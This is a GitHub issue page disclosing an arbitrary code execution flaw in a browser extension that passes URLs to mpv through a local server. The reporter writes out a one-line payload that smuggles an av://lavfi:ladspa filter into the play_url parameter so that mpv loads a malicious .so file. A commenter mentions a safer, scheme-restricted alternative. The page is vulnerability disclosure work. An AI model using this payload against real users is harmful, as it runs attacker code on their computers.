Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary code execution #90

Open
Vendicated opened this issue Nov 14, 2022 · 1 comment
Open

Arbitrary code execution #90

Vendicated opened this issue Nov 14, 2022 · 1 comment

Comments

@Vendicated
Copy link

This extension allows any site to run arbitrary .so files on your computer

This can be done via open("http://localhost:7531/?play_url=${URLENCODE(av://lavfi:ladspa=file=/some/evil/so/here.so)}", "_blank")

See also mpv-player/mpv#7985

Here's a demonstration

simplescreenrecorder-2022-11-14_23.57.07.mp4
@eylles
Copy link

eylles commented Oct 15, 2023

i just happen to read on that as i'm finding it useful for the current adblock problem, as i wanted to also address my issue with the python server script launching multiple instances, it seems mpv-handler solved the issue by limiting the uri schemes to only the safe ones.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants